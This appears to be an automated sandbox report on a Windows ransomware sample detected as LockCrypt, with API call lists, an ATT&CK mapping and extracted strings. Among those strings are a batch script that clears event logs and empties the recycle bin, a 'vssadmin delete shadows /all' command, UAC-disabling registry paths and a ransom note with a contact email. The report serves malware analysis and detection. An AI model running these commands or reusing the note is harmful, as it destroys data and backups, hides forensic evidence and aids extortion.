Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report module.8144.18ffc90c0.400000.dll

Overview

General Information

Joe Sandbox Version:26.0.0
Analysis ID:136638
Start date:29.05.2019
Start time:16:49:35
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 12m 37s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:module.8144.18ffc90c0.400000.dll (renamed file extension from dll to exe)
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:11
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
Analysis stop reason:Timeout
Detection:MAL
Classification:mal80.rans.evad.winEXE@2/1@0/0
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 23
  • Number of non-executed functions: 93
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
Warnings:
Show All
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, dllhost.exe, WMIADAP.exe, conhost.exe, CompatTelRunner.exe, svchost.exe

Detection

StrategyScoreRangeReportingWhitelistedDetection
Threshold800 - 100falsemalicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")
Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and Control
Valid AccountsWindows Remote ManagementWinlogon Helper DLLAccess Token Manipulation1Disabling Security Tools1Credential DumpingSystem Time Discovery1Application Deployment SoftwareClipboard Data1Data Encrypted21Standard Cryptographic Protocol1
Replication Through Removable MediaService ExecutionPort MonitorsProcess Injection1Software Packing1Network SniffingQuery Registry1Remote ServicesData from Removable MediaExfiltration Over Other Network MediumCommonly Used Port1
Drive-by CompromiseWindows Management InstrumentationAccessibility FeaturesPath InterceptionAccess Token Manipulation1Input CaptureProcess Discovery2Windows Remote ManagementData from Network Shared DriveAutomated ExfiltrationCustom Cryptographic Protocol
Exploit Public-Facing ApplicationScheduled TaskSystem FirmwareDLL Search Order HijackingProcess Injection1Credentials in FilesApplication Window Discovery1Logon ScriptsInput CaptureData EncryptedMultiband Communication
Spearphishing LinkCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessDeobfuscate/Decode Files or Information1Account ManipulationAccount Discovery1Shared WebrootData StagedScheduled TransferStandard Cryptographic Protocol
Spearphishing AttachmentGraphical User InterfaceModify Existing ServiceNew ServiceFile Deletion1Brute ForceSystem Owner/User Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used Port
Spearphishing via ServiceScriptingPath InterceptionScheduled TaskObfuscated Files or Information2Two-Factor Authentication InterceptionSecurity Software Discovery21Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used Port
Supply Chain CompromiseThird-party SoftwareLogon ScriptsProcess InjectionDLL Side-Loading1Bash HistoryFile and Directory Discovery1Remote Desktop ProtocolClipboard DataExfiltration Over Alternative ProtocolStandard Application Layer Protocol
Trusted RelationshipRundll32DLL Search Order HijackingService Registry Permissions WeaknessProcess InjectionInput PromptSystem Information Discovery13Windows Admin SharesAutomated CollectionExfiltration Over Physical MediumMultilayer Encryption

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Antivirus or Machine Learning detection for sampleShow sources
Source: module.8144.18ffc90c0.400000.exeJoe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 0.0.module.8144.18ffc90c0.400000.exe.400000.0.unpackJoe Sandbox ML: detected
Source: 0.1.module.8144.18ffc90c0.400000.exe.400000.0.unpackJoe Sandbox ML: detected
Source: 0.2.module.8144.18ffc90c0.400000.exe.400000.0.unpackJoe Sandbox ML: detected

Cryptography:

barindex
Uses Microsoft's Enhanced Cryptographic ProviderShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401000 EntryPoint,CryptAcquireContextA,lstrcpyW,lstrlenW,lstrcatW,GetFileAttributesW,CreateFileW,WriteFile,CloseHandle,SetFileAttributesW,GlobalFree,0_2_00401000
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_2_0040128D
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_0040191C
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_1_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_00401000 EntryPoint,CryptAcquireContextA,lstrcpyW,lstrlenW,lstrcatW,GetFileAttributesW,CreateFileW,WriteFile,CloseHandle,SetFileAttributesW,GlobalFree,0_1_00401000
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_1_0040128D
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_0040191C

Spreading:

barindex
Contains functionality to enumerate / list files inside a directoryShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_2_004014CC
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_004014CC FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,GlobalMemoryStatus,Sleep,CreateThread,CloseHandle,lstrcmpiW,lstrlenW,lstrcmpiW,lstrcatW,lstrlenW,lstrcatW,lstrcatW,lstrcatW,SetFileAttributesW,FindNextFileW,FindClose,GlobalFree,0_1_004014CC
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_2_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E95DAE FindFirstFileW,9_2_00E95DAE
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00E9A394 memset,FindFirstFileW,memset,PathRemoveFileSpecW,WerRegisterFile,FindNextFileW,FindClose,9_1_00E9A394
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_1_00E95DAE FindFirstFileW,9_1_00E95DAE

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Contains functionality for read data from the clipboardShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E9765E OpenClipboard,9_2_00E9765E

Spam, unwanted Advertisements and Ransom Demands:

barindex
Detected LockCrypt RansomwareShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_004017A2
Contains functionality to clear event logsShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %00_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %00_1_0040191C
Contains functionality to encrypt and move a file in one functionShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_2_0040128D
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_0040128D MoveFileW,CreateFileW,MoveFileW,Sleep,CreateFileMappingA,CloseHandle,CryptAcquireContextA,CloseHandle,CryptGenKey,CryptReleaseContext,CryptExportKey,CryptDestroyKey,MapViewOfFile,CryptEncrypt,CryptEncrypt,UnmapViewOfFile,CloseHandle,CryptDestroyKey,CryptReleaseContext,SetFilePointerEx,WriteFile,WriteFile,CloseHandle,SetFileAttributesW,0_1_0040128D
Deletes shadow drive data (may be related to ransomware)Show sources
Source: module.8144.18ffc90c0.400000.exeBinary or memory string: /c vssadmin delete shadows /all
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000000.593186365.0000000000403000.00000008.sdmpBinary or memory string: del %0/c vssadmin delete shadows /all/c Regsvr32 /s Rsaenh.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-openSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromptOnSecureDesktopEnableLUAConsentPromptBehaviorAdminSeDebugPrivilegeSeBackupPrivilegeSeRestorePrivilegeunlock"c:\Decoding help.hta"searchfilesC:\windows\searchfiles.exeC:\Windows\System32\mshta.exe
Source: module.8144.18ffc90c0.400000.exeBinary or memory string: /c vssadmin delete shadows /all
Source: module.8144.18ffc90c0.400000.exeBinary or memory string: del %0/c vssadmin delete shadows /all/c Regsvr32 /s Rsaenh.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-openSOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PromptOnSecureDesktopEnableLUAConsentPromptBehaviorAdminSeDebugPrivilegeSeBackupPrivilegeSeRestorePrivilegeunlock"c:\Decoding help.hta"searchfilesC:\windows\searchfiles.exeC:\Windows\System32\mshta.exe
Detected suspicious e-Mail address in disassemblyShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS0_1_0040191C
Contains functionality to import cryptographic keys (often used in ransomware)Show sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_2_0040191C
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_00401063 CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_1_00401063
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_004017A2 GetModuleFileNameA,lstrcmpiA,RegOpenKeyExA,lstrlenA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,CopyFileA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,CryptAcquireContextA,GetLastError,GetEnvironmentVariableA,ShellExecuteA,Sleep,CryptAcquireContextA,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_004017A2
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_0040191C CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextA,CryptImportKey,CryptEncrypt,CryptEncrypt,CryptDestroyKey,KiUserExceptionDispatcher,CryptReleaseContext,RegSetValueExA,RegSetValueExA,RegCloseKey,RtlZeroMemory,RegOpenKeyExA,RegSetValueExA,RegSetValueExA,RegSetValueExA,RegCloseKey,CryptAcquireContextA,CryptImportKey,GetSystemTimeAsFileTime,FileTimeToSystemTime,GetDateFormatA,lstrlenA,MultiByteToWideChar,lstrcatA,RegCreateKeyA,lstrcatA,lstrcatA,lstrlenA,RegSetValueExA,RegCloseKey,SHChangeNotify,GetEnvironmentVariableA,ShellExecuteA,GlobalFree,SetErrorMode,Sleep,Sleep,ShellExecuteA,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,0_1_0040191C

System Summary:

barindex
Found potential string decryption / allocating functionsShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00E94307 appears 246 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00EA29EC appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00E94E9D appears 328 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00EA31CA appears 74 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00EA3194 appears 116 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00E91E20 appears 34 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00E9851B appears 122 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00EA2BBA appears 262 times
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: String function: 00EA3161 appears 176 times
Sample file is different than original file name gathered from version infoShow sources
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2314748360.00000000004A0000.00000002.sdmpBinary or memory string: OriginalFilenamempr.dll.muij% vs module.8144.18ffc90c0.400000.exe
Source: module.8144.18ffc90c0.400000.exe, 00000000.00000002.2316354878.0000000002600000.00000002.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs module.8144.18ffc90c0.400000.exe
Tries to load missing DLLsShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeSection loaded: wow64log.dllJump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeSection loaded: wow64log.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal80.rans.evad.winEXE@2/1@0/0
Contains functionality to adjust token privileges (e.g. debug / backup)Show sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401DE7 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,0_2_00401DE7
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_1_00401DE7 OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,0_1_00401DE7
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E97025 GetDiskFreeSpaceExW,9_2_00E97025
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeCode function: 0_2_00401D2D CreateToolhelp32Snapshot,Process32FirstW,lstrcmpiW,lstrlenW,GetCurrentProcessId,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle,Sleep,0_2_00401D2D
Contains functionality to instantiate COM classesShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00E921A2 CoCreateInstance,9_2_00E921A2
Creates files inside the user directoryShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeFile created: C:\Users\user\AppData\Local\Microsoft\OneDrive\logs\Common\FileCoAuth-2019-5-29.2357.2916.1.aodlJump to behavior
Might use command line argumentsShow sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCommand line argument: FileCoAuth9_2_00E92E4B
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCommand line argument: FileCoAuth9_2_00E92E4B
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCommand line argument: FileCoAuth9_2_00E92E4B
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCommand line argument: FileCoAuth9_1_00E92E4B
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCommand line argument: FileCoAuth9_1_00E92E4B
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCommand line argument: FileCoAuth9_1_00E92E4B
PE file has an executable .text section and no other executable sectionShow sources
Source: module.8144.18ffc90c0.400000.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policiesShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample might require command line arguments (.Net)Show sources
Source: FileCoAuth.exeString found in binary or memory: /installperfcounters
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe 'C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exe'
Source: unknownProcess created: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exe -Embedding
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\module.8144.18ffc90c0.400000.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: FileCoAuth.pdb source: FileCoAuth.exe, 00000009.00000000.2084517723.0000000000EA6000.00000002.sdmp
Source: Binary string: FileCoAuth.pdbDD source: FileCoAuth.exe, 00000009.00000000.2084517723.0000000000EA6000.00000002.sdmp

Data Obfuscation:

barindex
PE file contains an invalid checksumShow sources
Source: module.8144.18ffc90c0.400000.exeStatic PE information: real checksum: 0x3f67 should be: 0xa6a9
Uses code obfuscation techniques (call, push, ret)Show sources
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00EA313E push ecx; ret 9_2_00EA3151
Source: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6816.0313_2\FileCoAuth.exeCode function: 9_2_00EA3265 push ecx; ret 9_2_00EA3278
